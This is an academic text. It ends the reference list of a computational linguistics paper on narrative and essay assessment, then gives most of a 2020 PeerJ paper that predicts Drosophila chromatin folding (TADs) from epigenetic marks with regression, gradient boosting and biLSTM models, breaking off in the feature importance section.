Meeting of the Associ- ation for Computational Linguistics, pages 857–864, Stroudsburg, PA, USA. Association for Computational Linguistics. Franziska Hartung, Michael Burke, Peter Hagoort, and Roel M. Willems. 2016. Taking perspective: Personal pronouns affect experiential aspects of literary read- ing. PLoS ONE, 5(11). Bram Jans, Steven Bethard, Ivan Vulic, and Marie Francine Moens. 2012. Skip N-grams and ranking functions for predicting script events. In Proceedings of the 13th Conference of the Euro- pean Chapter of the Association for Computational Linguistics, pages 336–344, Avignon, France, April. Stephen P. Klein, Brian M. Stecher, Richard J. Shavel- son, Daniel McCaffrey, Tor Ormseth, Robert M. Bell, Kathy Comfort, and Abdul R. Othman. 1998. An- alytic versus holistic scoring of science performance tasks. Applied Measurement in Education, 11(2):121– 137. Thomas K. Landauer, Darrell Laham, and Peter W. Foltz. 2003. Automated scoring and annotation of essays with the intelligent essay assessor. Automated essay scoring: A cross-disciplinary perspective, pages 87– 112. Yong-Won Lee, Claudia Gentile, and Robert Kantor. 2010. Toward automated multi-trait scoring of essays: Investigating links among holistic, analytic, and text feature scores. Applied Linguistics, 31(3):391–417. Wendy G. Lehnert. 1981. Plot units and narrative sum- marization. Cognitive Science, 5(4):293–331. Inderjeet Mani. 2012. Computational modeling of nar- rative. Synthesis Lectures on Human Language Tech- nologies, 5(3):1–142. Christopher D. Manning, Mihai Surdeanu, John Bauer, Jenny Finkel, Steven J. Bethard, and David McClosky. 2014. The Stanford CoreNLP natural language pro- cessing toolkit. In Association for Computational Lin- guistics System Demonstrations, pages 55–60. Neil McIntyre and Mirella Lapata. 2010. Plot induction and evolutionary search for story generation. In Pro- ceedings of the 48th Annual Meeting of the Associa- tion for Computational Linguistics, pages 1562–1572, Uppsala, Sweden. Anne McKeough, Randy Genereux, and Joan Jeary. 2006. Structure, content, and language usage: How do exceptional and average storywriters differ? High Ability Studies, 17(2):203 – 223. Phyllis Mentzell, Elizabeth Vander Lei, and Duane H. Roen. 1999. Audience Considerations for Evaluating Writing. Evaluating Writing: The Role of Teacher’s Knowledge about Text, Learning, and Culture. Mohsen Mesgar and Michael Strube. 2016. Lexical coherence graph modeling using word embeddings. In Proceedings of the 2016 Conference of the North American Chapter of the Association for Computa- tional Linguistics: Human Language Technologies, pages 1414–1423. 104 Jon Miller and Robin Chapman. 1985. Systematic Anal- ysis of Language Transcripts. Madison, WI: Language Analysis Laboratory. Nasrin Mostafazadeh, Nathanael Chambers, Xiaodong He, Devi Parikh, Dhruv Batra, Pushmeet Kohli Lucy Vanderwende, and James Allen. 2016. A corpus and cloze evaluation for deeper understanding of com- monsense stories. In Proceedings of the 2016 Confer- ence of the North American Chapter of the Associa- tion for Computational Linguistics: Human Language Technologies, pages 839–849, San Diego, California, June 12-17. Association for Computational Linguis- tics. Courtney Napoles, Matthew Gormley, and Benjamin Van Durme. 2012. Annotated Gigaword. In Proceed- ings of the Joint Workshop on Automatic Knowledge Base Construction & Web-scale Knowledge Extrac- tion, pages 95–100. Huy Nguyen and Diane J. Litman. 2016. Improv- ing Argument Mining in Student Essays by Learning and Exploiting Argument Indicators versus Essay Top- ics. In Proceedings of the Twenty-Ninth International Florida Artificial Intelligence Research Society Con- ference, pages 485–490. Kiem-Hieu Nguyen, Xavier Tannier, Olivier Ferret, and Romaric Besancon. 2015. Generative event schema induction with entity disambiguation. In Proceed- ings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th Interna- tional Joint Conference on Natural Language Process- ing, pages 188–197, Beijing, China, July. Keith Oatley. 1999. Meetings of minds: Dialogue, sym- pathy, and identification, in reading fiction. Poetics, 26:439–454. Natalie G. Olinghouse and Jacqueline T. Leaird. 2009. The relationship between measures of vocabulary and narrative writing quality in second- and fourth-grade students. Reading & Writing, 22(5):545 – 565. Kieran O’Loughlin. 1995. Lexical density in candidate output on direct and semi-direct versions of an oral proficiency test. Language Testing, 12:217–237. Jessica Ouyang and Kathleen McKeown. 2015. Mod- eling reportable events as turning points in narrative. In Proceedings of the 2015 Conference on Empiri- cal Methods in Natural Language Processing, pages 2149–2158, Lisbon, Portugal. Cecilia Ovesdotter Alm and Richard Sproat. 2005. Emo- tional sequencing and development in fairy tales. In International Conference on Affective Computing and Intelligent Interaction, pages 668–674. Springer. Ellis Batten Page. 1994. Computer grading of student prose, using modern concepts and software. The Jour- nal of Experimental Education, 62(2):127–142. Robert Parker, David Graff, Junbo Kong, Ke Chen, and Kazuaki Maeda. 2011. English Gigaword Fifth Edi- tion. Philadelphia: Linguistic Data Consortium. Rebecca J. Passonneau, Adam Goodkind, and Elena T. Levy. 2007. Annotation of Children’s Oral Narra- tions: Modeling Emergent Narrative Skills for Com- putational Applications. In Proceedings of the Twen- tieth International Florida Artificial Intelligence Re- search Society Conference, pages 253–258. F. Pedregosa, G. Varoquaux, A. Gramfort, V. Michel, B. Thirion, O. Grisel, M. Blondel, P. Prettenhofer, R. Weiss, V. Dubourg, J. Vanderplas, A. Passos, D. Cournapeau, M. Brucher, M. Perrot, and E. Duches- nay. 2011. Scikit-learn: Machine learning in Python. Journal of Machine Learning Research, 12:2825– 2830. Douglas B. Petersen, Sandra Laing Gillam, and Ronald B. Gillam. 2008. Emerging procedures in nar- rative assessment: The index of narrative complexity. Topics in Language Disorders, 28(2):115 – 130. Rashmi Prasad, Nikhil Dinesh, Alan Lee, Eleni Milt- sakaki, Livio Robaldo, Aravind K. Joshi, and Bon- nie L. Webber. 2008. The Penn Discourse TreeBank 2.0. In Proceedings of the Sixth International Confer- ence on Language Resources and Evaluation. Gerald Prince. 1973. A Grammar of Stories: An Intro- duction. Mouton, The Hague. Andrew J. Reagan, Lewis Mitchell, Dilan Kiley, Christo- pher M. Danforth, and Peter Sheridan Dodds. 2016. The emotional arcs of stories are dominated by six ba- sic shapes. The European Physical Journal Data Sci- ence, 5(1):31. Shlomith Rimmon-Kenan. 2002. Narrative Fiction: Contemporary Poetics. Routledge, London. Roger C. Schank and Robert P. Abelson. 1977. Scripts, Plans, Goals and Understanding: An Inquiry into Hu- man Knowledge Structures. Lawrence Erlbaum Asso- ciates, Hillsdale, NJ, USA. Mark D. Shermis and Jill Burstein. 2013. Handbook of Automated Essay Evaluation: Current Applications and New Directions. Routledge. Carlota S. Smith. 2005. Aspectual entities and tense in discourse. In Paula Kempchinsky and Roumyana Slabakova, editors, Aspectual Inquiries, pages 223– 237. Springer Netherlands, Dordrecht. Swapna Somasundaran, Jill Burstein, and Martin Chodorow. 2014. Lexical chaining for measuring discourse coherence quality in test-taker essays. In Proceedings of the 25th International Conference on Computational Linguistics: Technical Papers. Swapna Somasundaran, Chong Min Lee, Martin Chodorow, and Xinhao Wang. 2015. Automated scor- ing of picture-based story narration. In Proceedings 105 of the Tenth Workshop on Innovative Use of NLP for Building Educational Applications. Swapna Somasundaran, Brian Riordan, Binod Gyawali, and Su-Youn Yoon. 2016. Evaluating argumentative and narrative essays using graphs. In Proceedings of the 26th International Conference on Computational Linguistics: Technical Papers, pages 1568–1578, Os- aka, Japan, December. Christian Stab and Iryna Gurevych. 2017. Recogniz- ing Insufficiently Supported Arguments in Argumen- tative Essays. In Proceedings of the 15th Conference of the European Chapter of the Association for Com- putational Linguistics: Long Papers, volume 1. Nancy L. Stein and Christine G. Glenn. 1979. An Anal- ysis of Story Comprehension in Elementary School Children: A test of a schema. New Directions in Dis- course Processing. Carol J. Strong, Mercer Mayer, and Marianna Mayer. 1998. The Strong Narrative Assessment Procedure. Thinking Publications. Reid Swanson, Elahe Rahimtoroghi, Thomas Corcoran, and Marilyn A. Walker. 2014. Identifying narrative clause types in personal stories. In Proceedings of the 15th Annual Meeting of the Special Interest Group on Discourse and Dialogue, page 171. Jean Ure. 1971. Lexical density and register differenti- ation. In Perren G. E. and Trim J. L. M., editors, Ap- plications of linguistics. Selected papers of the Second International Congress of Applied Linguistics, Cam- bridge 1969, pages 443–452. Cambridge University Press, Cambridge, UK. Josep Valls-Vargas, Jichen Zhu, and Santiago Ontanón. 2014. Toward automatic role identification in unan- notated folk tales. In Proceedings of the Tenth Asso- ciation for the Advancement of Artificial Intelligence Conference on Artificial Intelligence and Interactive Digital Entertainment, pages 188–194. Advancement of Artificial Intelligence Press. Zeno Vendler. 1967. Linguistics in Philosophy. Cornell University Press, Ithaca, NY. Stephen G. Ware, Brent E. Harrison, Robert Michael Young, and David L. Roberts. 2011. Initial results for measuring four dimensions of narrative conflict. In The Fourth Workshop on Intelligent Narrative Tech- nologies at the 2011 AI and Interactive Digital Enter- tainment Conference. Janyce M. Wiebe. 1994. Tracking point of view in nar- rative. Computational Linguistics, 20(2):233–287. Theresa Wilson, Janyce Wiebe, and Paul Hoffmann. 2005. Recognizing contextual polarity in phrase-level sentiment analysis. In Proceedings of the Conference on Human Language Technology and Empirical Meth- ods in Natural Language Processing, pages 347–354. Association for Computational Linguistics. Guoxing Yu. 2010. Lexical diversity in writing and speaking task performances. Applied Linguistics, 31(2):236–259. 106 work_p2xqvo6isfb75mbvnnkzerthaa ---- Submitted 28 August 2020 Accepted 30 September 2020 Published 30 November 2020 Corresponding authors Michal B. Rozenwald, mbrozenvald@edu.hse.ru, michal.rozenwald@gmail.com Mikhail S. Gelfand, m.gelfand@skoltech.ru, michal.rozenwald@gmail.com Academic editor Alexander Bolshoy Additional Information and Declarations can be found on page 15 DOI 10.7717/peerj-cs.307 Copyright 2020 Rozenwald et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A machine learning framework for the prediction of chromatin folding in Drosophila using epigenetic features Michal B. Rozenwald1, Aleksandra A. Galitsyna2, Grigory V. Sapunov1,3, Ekaterina E. Khrameeva2 and Mikhail S. Gelfand2,4 1 Faculty of Computer Science, National Research University Higher School of Economics, Moscow, Russia 2 Skolkovo Institute of Science and Technology, Moscow, Russia 3 Intento, Inc., Berkeley, CA, USA 4 A.A. Kharkevich Institute for Information Transmission Problems, RAS, Moscow, Russia ABSTRACT Technological advances have lead to the creation of large epigenetic datasets, including information about DNA binding proteins and DNA spatial structure. Hi-C experiments have revealed that chromosomes are subdivided into sets of self-interacting domains called Topologically Associating Domains (TADs). TADs are involved in the regulation of gene expression activity, but the mechanisms of their formation are not yet fully understood. Here, we focus on machine learning methods to characterize DNA folding patterns in Drosophila based on chromatin marks across three cell lines. We present linear regression models with four types of regularization, gradient boosting, and recurrent neural networks (RNN) as tools to study chromatin folding characteristics associated with TADs given epigenetic chromatin immunoprecipitation data. The bidirectional long short-term memory RNN architecture produced the best prediction scores and identified biologically relevant features. Distribution of protein Chriz (Chromator) and histone modification H3K4me3 were selected as the most informative features for the prediction of TADs characteristics. This approach may be adapted to any similar biological dataset of chromatin features across various cell lines and species. The code for the implemented pipeline, Hi-ChiP-ML, is publicly available: https://github.com/MichalRozenwald/Hi-ChIP-ML Subjects Bioinformatics, Computational Biology, Molecular Biology, Data Mining and Machine Learning, Data Science Keywords Topologically Associating Domains (TADs), Recurrent Neural Networks (RNN), Hi-C experiments, Linear Regression, Gradient Boosting, Chromatin, DNA folding patterns, Machine Learning INTRODUCTION Machine learning has proved to be an essential tool for studies in the molecular biology of the eukaryotic cell, in particular, the process of gene regulation (Eraslan et al., 2019; Zeng, Wang & Jiang, 2020). Gene regulation of higher eukaryotes is orchestrated by two primary interconnected mechanisms, the binding of regulatory factors to the promoters and enhancers, and the changes in DNA spatial folding. The resulting binding patterns and chromatin structure represent the epigenetic state of the cells. They can be assayed How to cite this article Rozenwald MB, Galitsyna AA, Sapunov GV, Khrameeva EE, Gelfand MS. 2020. A machine learning framework for the prediction of chromatin folding in Drosophila using epigenetic features. PeerJ Comput. Sci. 6:e307 http://doi.org/10.7717/peerj-cs.307 https://peerj.com/computer-science mailto:mbrozenvald@edu.hse.ru mailto:michal.rozenwald@gmail.com mailto:m.gelfand@skoltech.ru mailto:michal.rozenwald@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.307 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://github.com/MichalRozenwald/Hi-ChIP-ML http://doi.org/10.7717/peerj-cs.307 by high-throughput techniques, such as chromatin immunoprecipitation (Ren et al., 2000; Johnson et al., 2007) and Hi-C (Lieberman-Aiden et al., 2009). The epigenetic state is tightly connected with inheritance and disease (Lupiáñez, Spielmann & Mundlos, 2016; Yuan et al., 2018; Trieu, Martinez-Fundichely & Khurana, 2020). For instance, disruption of chromosomal topology in humans affects gliomagenesis and limb malformations (Krijger & De Laat, 2016). However, the details of underlying processes are yet to be understood. The study of Hi-C maps of genomic interactions revealed the structural and regulatory units of eukaryotic genome, topologically associating domains, or TADs. TADs represent self-interacting regions of DNA with well-defined boundaries that insulate the TAD from interactions with adjacent regions (Lieberman-Aiden et al., 2009; Dixon et al., 2012; Rao et al., 2014). In mammals, the boundaries of TADs are defined by the binding of insulator protein CTCF (Rao et al., 2014). However, Drosophila CTCF homolog is not essential for the formation of TAD boundaries (Wang et al., 2018). Contribution of CTCF to the boundaries was detected in neuronal cells, but not in embryonic cells of Drosophila (Chathoth & Zabet, 2019). At the same time, up to eight different insulator proteins have been proposed to contribute to the formation of TADs boundaries (Ramírez et al., 2018). Ulianov et al. (2016) demonstrated that active transcription plays a key role in the Drosophila chromosome partitioning into TADs. Active chromatin marks are preferably found at TAD borders, while repressive histone modifications are depleted within inter- TADs. Thus, histone modifications instead of insulator binding factors might be the main TAD-forming factors in this organism. To determine factors responsible for the TAD boundary formation in Drosophila, Ulianov et al. (2016) utilized machine learning techniques. For that, they formulated a classification task and used a logistic regression model. The model input was a set of ChIP-chip signals for a genomic region, and the output, a binary value indicating whether the region was located at the boundary or within a TAD. Similarly, Ramírez et al. (2018) demonstrated the effectiveness of the lasso regression and gradient boosting for the same task. However, this approach has two substantial limitations. First, the prediction of TAD state as a categorical output depends on the TAD calling procedure. It requires setting a threshold for the TAD boundary definition and it is insensitive to sub-threshold boundaries. Alternatively, the TAD status of a region may be derived from a Hi-C map either by calculation of local characteristics of TADs such as Insulation Score (Crane et al., 2015), D-score (Stadhouders et al., 2018), Directionality Index (Dixon et al., 2012), or by dynamic programming methods, such as Armatus (Filippova et al., 2014). Methods assessing local characteristics of TADs result in assigning a continuous score to genomic bins along the chromosome. Dynamic programming methods are typically not anchored to a local genomic region and consider Hi-C maps of whole chromosomes. The calculation of transitional gamma has the advantages of both approaches (Ulianov et al., 2016). It runs dynamic programming for whole-chromosome data for multiple parameters and assesses the score for each genomic region. The second limitation is that regression and gradient boosting in Ulianov et al. (2016) and Ramírez et al. (2018) account for the features of a given region of the genome, but Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 2/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.307 ignore the adjacent regions. Such contextual information might be crucial for the TAD status in Drosophila. For a possible solution, one may look at instructive examples of other chromatin architecture problems, such as improvement of Hi-C data resolution (Gong et al., 2018; Schwessinger et al., 2019; Li & Dai, 2020), inference of chromatin structure (Cristescu et al., 2018; Trieu, Martinez-Fundichely & Khurana, 2020), prediction of genomic regions interactions (Whalen, Truty & Pollard, 2016; Zeng, Wu & Jiang, 2018; Li, Wong & Jiang, 2019; Fudenberg, Kelley & Pollard, 2019; Singh et al., 2019; Jing et al., 2019; Gan, Li & Jiang, 2019; Belokopytova et al., 2020), and, finally, TAD boundaries prediction in mammalian cells (Gan et al., 2019; Martens et al., 2020). The machine learning approaches used in these works include generalized linear models (Ibn-Salem & Andrade-Navarro, 2019), random forest (Bkhetan & Plewczynski, 2018; Gan et al., 2019), other ensemble models (Whalen, Truty & Pollard, 2016), and neural networks: multi-layer perceptron (Gan et al., 2019), dense neural networks (Zeng, Wu & Jiang, 2018; Farré et al., 2018; Li, Wong & Jiang, 2019), convolutional neural networks (Schreiber et al., 2017), generative adversarial networks (Liu, Lv & Jiang, 2019), and recurrent neural networks (Cristescu et al., 2018; Singh et al., 2019; Gan, Li & Jiang, 2019). Among these methods, recurrent neural networks (RNNs) provide a comprehensive architecture for analyzing sequential data (Graves, Jaitly & Mohamed, 2013), due to the temporal modeling capabilities. A popular implementation of RNN long short-term memory (LSTM) models (Hochreiter & Schmidhuber, 1997) creates informative statistics that provide solutions for complex long-time-lag tasks (Graves, 2012). Thus, the application of LTSM RNNs to problems with sequential ordering of a target, such as DNA bins characteristics, is a promising approach. Moreover, this feature is particularly relevant for the TAD boundary prediction in Drosophila, where the histone modifications of extended genomic regions govern the formation of boundaries (Ulianov et al., 2016). Here, we analyze the epigenetic factors contributing to the TAD status of the genomic regions of Drosophila. As opposed to previous approaches, we incorporate information about the region context on two levels. First, we utilize the context-aware TAD characteristic transitional gamma. Second, we use the advanced method of recurrent neural network that preserves the information about features of adjacent regions. MATERIALS AND METHODS Data Hi-C datasets for three cultured Drosophila melanogaster cell lines were taken from Ulianov et al. (2016). Cell lines Schneider-2 (S2) and Kc167 from late embryos and DmBG3-c2 (BG3) from the central nervous system of third-instar larvae were analysed. The Drosophila genome (dm3 assembly) was binned at the 20-kb resolution resulting in 5950 sequential genomic regions of equal size. Each bin was described by the start coordinate on the chromosome and by the signal from a set of ChIP-chip experiments. The ChIP-chip data were obtained from the modENCODE database (Waterston et al., 2009) and processed as in Ulianov et al. (2016). Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 3/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.307 As chromatin architecture is known to be correlated with epigenetic characteristics in Drosophila (Ulianov et al., 2016; Hug et al., 2017; Ramírez et al., 2018), we selected two sets of epigenetic marks, i.e., transcription factors (TF), and insulator protein binding sites, and histone modifications (HM), for further analysis. The first set included five features (Chriz, CTCF, Su(Hw), H3K27me3, H3K27ac), which had been reported as relevant for TAD formation in previous studies (Ulianov et al., 2016). The second set contained eighteen epigenetic marks in total, extending the first set with thirteen potentially relevant features chosen based on the literature (RNA polymerase II, BEAF-32, GAF, CP190, H3K4me1, H3K4me2, H3K4me3, H3K9me2, H3K9me3, H3K27me1, H3K36me1, H3K36me3, H4K16ac). To normalize the input data, we subtracted the mean from each value and then scaled it to the unit variance using the preprocessing scale function of the Sklearn Python library (Pedregosa et al., 2011). We standardized each feature independently; the mean and variance were calculated per each feature (chromatin mark) separately across all input objects (bins), see Fig. S2. For the full list of chromatin factors and their modENCODE IDs, see Table S1. Target value TADs are calculated based on Hi-C interactions matrix. As a result of TAD calling algorithm, TADs are represented as a segmentation of the genome into discrete regions. However, resulting segmentation typically depends on TAD calling parameters. In particular, widely used TAD segmentation software Armatus (Filippova et al., 2014) annotates TADs for a user-defined scaling parameter gamma. Gamma determines the average size and the number of TADs produced by Armatus on a given Hi-C map. Following Ulianov et al. (2016), we avoided the problem of selection of a single set of parameters for TADs annotation and calculated the local characteristic of TAD formation of the genome, namely, transitional gamma. The calculation of transitional gamma includes the TAD calling for a wide range of reasonable parameters gamma and selection of characteristic gamma for each genomic locus. This procedure is briefly described below. When parameter gamma is fixed, Armatus annotates each genomic bin as a part of a TAD, inter-TAD, or TAD boundary. The higher the gamma value is used in Armatus, the smaller on average the TADs sizes are. We perform the TAD calling with Armatus for a set of parameters and characterize each bin by transitional gamma at which this bin switches from being a part of a TAD to being a part of an inter-TAD or a TAD boundary. We illustrate the TADs annotation and calculation of transitional gamma in Figs. 1A–1C. Whole-genome Hi-C maps of Drosophila cells were collected from Ulianov et al. (2016) and processed using Armatus with a gamma ranging from 0 to 10 with a step of 0.01. We then calculated the transitional gamma for each bin. The resulting distribution of values can be found in Fig. 1D. We note that the value 10 is corresponding to the bins that form TAD regions that we have never observed as being TAD boundary or inter-TAD. These bins might switch from TADs with the further increase of gamma. However, they represent a minor fraction of the genome corresponding to strong inner-TAD bins. Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 4/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.307#supp-2 http://dx.doi.org/10.7717/peerj-cs.307#supp-3 http://dx.doi.org/10.7717/peerj-cs.307 Figure 1 (A–C) Example of annotation of chromosome 3R region by transitional gamma. For a given Hi-C matrix of Schneider-2 cells (A), TAD segmentations (B) are calculated by Armatus for a set of gamma values (from 0 to 10, a step of 0.01). Each line in B represents a single TAD. Then gamma tran- sitional (C) is calculated for each genomic region as the minimal value of gamma where the region be- comes inter-TAD or TAD boundary. The blue line in C represents the transitional gamma value for each genomic bin. The plots (B) and (C) are limited by gamma 2 for better visualization, although they are continued to the value of 10. Asterisk (*) denotes the region with gamma transitional of 1.64, the minimal value of gamma, where the corresponding region transitions from TAD to inter-TAD. (D) The histogram of the target value transitional gamma for Schneider-2 cell line. Note the peak at 10. Full-size DOI: 10.7717/peerjcs.307/fig-1 Problem statement To avoid ambiguity, we formally state our machine learning problem: • objects are genomic bins of 20-kb length that do not intersect, • input features are the measurements of chromatin factors’ binding, • target value is the transitional gamma, which characterizes the TAD status of the region and, thus, the DNA folding, • objective is to predict the value of transitional gamma and to identify which of the chromatin features are most significant in predicting the TAD state. Selection of loss function The target, transitional gamma, is a continuous variable ranging from 0 to 10, which yields a regression problem (Yan & Su, 2009). The classical optimization function for the regression is Mean Square Error (MSE), instead of precision, recall or accuracy, as for binary variables. However, the distribution of the target in our problem is significantly unbalanced (see Fig. 1D) because the target value of most of the objects is in the interval between 0 and 3. Thus, the contribution of the error on objects with a high true target value may be also high in the total score when using MSE. We note that the biological nature of genomic bins with high transitional gamma is different from other bins. Transitional gamma equal to 10 means that the bin never transformed from being a part of a TAD to an inter-TAD or TAD boundary. To solve this Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 5/21 https://peerj.com https://doi.org/10.7717/peerjcs.307/fig-1 http://dx.doi.org/10.7717/peerj-cs.307 contradiction, we have introduced a custom loss function called modified weighted Mean Square Error (wMSE). It might be reformulated as MSE multiplied by the weight (penalty) of the error, depending on the true value of the target variable. wMSE = 1 N N∑ i=1 (ytruei−ypredi) 2α−ytruei α , where N is the number of data points, ytruei is the true value for data point number i, ypredi is the predicted value for data point number i. Here, α is the maximum value of ytrue increased by 1 to avoid multiplying the error by 0. The maximum value of the transitional gamma in our dataset is 10, thus in our case, α equals 11. With wMSE as a loss function, the model is penalized less for errors on objects with high values of transitional gamma. Machine learning models To explore the relationships between the 3D chromatin structure and epigenetic data, we built linear regression (LR) models, gradient boosting (GB) regressors, and recurrent neural networks (RNN). The LR models were additionally applied with either L1 or L2 regularization and with both penalties. For benchmarking we used a constant prediction set to the mean value of the training dataset. Due to the DNA linear connectivity, our input bins are sequentially ordered in the genome. Neighboring DNA regions frequently bear similar epigenetic marks and chromatin properties (Kharchenko et al., 2011). Thus, the target variable values are expected to be vastly correlated. To use this biological property, we applied RNN models. In addition, the information content of the double-stranded DNA molecule is equivalent if reading in forward and reverse direction. In order to utilize the DNA linearity together with equivalence of both directions on DNA, we selected the bidirectional long short-term memory (biLSTM) RNN architecture (Schuster & Paliwal, 1997). The model takes a set of epigenetic properties for bins as input and outputs the target value of the middle bin. The middle bin is an object from the input set with an index i, where i equals to the floor division of the input set length by 2. Thus, the transitional gamma of the middle bin is being predicted using the features of the surrounding bins as well. The scheme of this model is presented in Fig. 2. We exploited the following parameters of the biLSTM RNN in our experiments. The sequence length of the RNN input objects is a set of consecutive DNA bins with fixed length that was varied from 1 to 10 (window size). The numbers of LSTM units that we tested for were 1, 4, 8, 16, 32, 64, 128, 256, 512. The weighted Mean Square Error loss function was chosen and models were trained with a stochastic optimizer Adam (Kingma & Ba, 2014). Early stopping was used to automatically identify the optimal number of training epochs. The dataset was randomly split into three groups: train dataset 70%, test dataset 20%, and 10% data for validation. To explore the importance of each feature from the input space, we trained the RNNs using only one of the epigenetic features as input. Additionally, we built models in which columns from the feature matrix were one by one replaced with zeros, and all other features Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 6/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.307 Figure 2 Scheme of the implemented bidirectional LSTM recurrent neural networks with one out- put. The values of {x1,..,xt} are the DNA bins with input window size t, {h1,..,ht} are the hidden states of the RNN model, yt/2 represents the corresponding target value transitional gamma of the middle bin xt/2. Note that each bin xi is characterized by a vector of chromatin marks ChIP-chip data. Full-size DOI: 10.7717/peerjcs.307/fig-2 were used for training. Further, we calculated the evaluation metrics and checked if they were significantly different from the results obtained while using the complete set of data. RESULTS Chromatin marks are reliable predictors of the TAD state First, we assessed whether the TAD state could be predicted from the set of chromatin marks for a single cell line (Schneider-2 in this section). The classical machine learning quality metrics on cross-validation averaged over ten rounds of training demonstrate strong quality of prediction compared to the constant prediction (see Table 1). High evaluation scores prove that the selected chromatin marks represent a set of reliable predictors for the TAD state of Drosophila genomic region. Thus, the selected set of 18 chromatin marks can be used for chromatin folding patterns prediction in Drosophila. The quality metric adapted for our particular machine learning problem, wMSE, demonstrates the same level of improvement of predictions for different models (see Table 2). Therefore, we conclude that wMSE can be used for downstream assessment of the quality of the predictions of our models. These results allow us to perform the parameter selection for linear regression (LR) and gradient boosting (GB) and select the optimal values based on the wMSE metric. For LR, we selected alpha of 0.2 for both L1 and L2 regularizations. Gradient boosting outperforms linear regression with different types of regularization on our task. Thus, the TAD state of the cell is likely to be more complicated than a linear combination of chromatin marks bound in the genomic locus. We used a wide range of variable parameters such as the number of estimators, learning rate, maximum depth of the individual regression estimators. The best results were observed while setting the Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 7/21 https://peerj.com https://doi.org/10.7717/peerjcs.307/fig-2 http://dx.doi.org/10.7717/peerj-cs.307 Table 1 Evaluation of classical machine learning scores for all models, based on 5-features and 18- features inputs. Model type MSE MSE MAE MAE R2 Train Test Train Test Constant prediction 3.71 3.72 1.36 1.31 0 Using 5 features: LR + L1 2.91 2.91 1.11 1.11 0.21 LR + L2 2.92 2.93 1.12 1.12 0.21 LR + L1 + L2 2.86 2.87 1.11 1.11 0.23 GB-250 2.45 2.67 1.10 1.11 0.28 biLSTM RNN 2.36 2.90 0.92 1.01 0.33 Using 18 features: LR + L1 2.77 2.77 1.09 1.09 0.25 LR + L2 2.69 2.69 1.08 1.08 0.27 LR + L1 + L2 2.67 2.68 1.07 1.07 0.28 GB-250 2.22 2.53 1.06 1.07 0.32 biLSTM RNN 2.03 2.45 0.85 0.90 0.43 Table 2 Weighted MSE of all models, based on 5-features and 18-features inputs. 5 features 18 features Train Test Train Test Constant prediction 1.61 1.62 1.61 1.62 Linear Regression 1.20 1.20 1.13 1.14 Linear regression + L1 1.17 1.17 1.12 1.12 Linear regression + L2 1.18 1.19 1.11 1.12 Linear regression + L1 + L2 1.17 1.16 1.11 1.11 Grad boosting 100 estimators 1.11 1.13 1.08 1.10 Grad boosting 250 estimators 1.06 1.11 0.95 1.07 biLSTM 64 units & 6 bins 0.83 0.88 0.79 0.84 ‘n_estimators’: 100, ‘max_depth’: 3 and n_estimators’: 250, ‘max_depth’: 4, both with ‘learning_rate’: 0.01. The scores are presented in Tables 1 and 2. The context-aware prediction of TAD state is the most reliable The alternative model that we studied was biLSTM neural network, which provides explicit accounting for linearly ordered bins in the DNA molecule. We have investigated the hyperparameters set for biLSTM and assessed the wMSE on various input window sizes and numbers of LSTM units. As we demonstrate in Fig. 3, the optimal sequence length is equal to the input window size 6 and 64 LSTM units. This result has a potential biological interpretation as the typical size of TADs in Drosophila, being around 120 kb at 20-kb resolution Hi-C maps which equals to 6 bins. The incorporation of sequential dependency improved the prediction significantly, as demonstrated by the best quality scores achieved by the biLSTM (Table 2). The selected Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 8/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.307 Figure 3 Selection of the biLSTM parameters. Weighted MSE scores for the train and test datasets are presented. (A) Results of RNN with 64 units for different sizes of sequence length. The sequence size corresponds to the input window size of the RNN or number of bins used together as an input sequence for the neural network. (B) Results of RNN with an input sequence of six bins for the different number of LSTM units. The box highlights the best scores. The biLSTM with six input bins and 64 LSTM units was used throughout this study if not specified otherwise. Full-size DOI: 10.7717/peerjcs.307/fig-3 biLSTM with the best hyperparameters set performed two times better than the constant prediction and outscored all trained LR and GB models, see Tables 1 and 2. We note that the proposed biLSTM model does not take into account the target value of the neighboring regions, both while training and predicting. Our model uses the input values (chromatin marks) solely for the whole window and target values for the central bin in the window for training and assessment of validation results. Thus, we conclude that biLSTM was able to capture and utilize the sequential relationship of the input objects in terms of the physical distance in the DNA. Reduced set of chromatin marks is sufficient for a reliable prediction of the TAD state in Drosophila Next, we used an opportunity to analyse feature importance and select the set of factors most relevant for chromatin folding. For an initial analysis, we selected a subset of five chromatin marks that we considered important based on the literature (two histone marks and three potential insulator proteins, 5-features model). The 5-features model performed slightly worse than the initial 18-features model (see Tables 1 and 2). The difference in quality scores is rather small, supporting the selection of these five features as biologically relevant for TAD state prediction. We note that the small impact of shrinking of the number of predictors might indicate the high correlation between chromatin features. This is in line with the concept of chromatin states when several histone modifications and other chromatin factors are responsible for a single function of DNA region, such as gene expression (Filion et al., 2010; Kharchenko et al., 2011). Feature importance analysis reveals factors relevant for chromatin folding into TADs in Drosophila We have evaluated the weight coefficients of the linear regression because the large weights strongly influence the model prediction. Chromatin marks prioritization of 5-features LR Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 9/21 https://peerj.com https://doi.org/10.7717/peerjcs.307/fig-3 http://dx.doi.org/10.7717/peerj-cs.307 Figure 4 Weighted MSE using one feature for each input bin in the biLSTM RNN. The first mark (‘all’) corresponds to scores of NNs using the first dataset of chromatin marks features together, the last mark (‘const’) represents wMSE using constant prediction. Note that the lower the wMSE value the better the quality of prediction. Full-size DOI: 10.7717/peerjcs.307/fig-4 model demonstrated that the most valuable feature 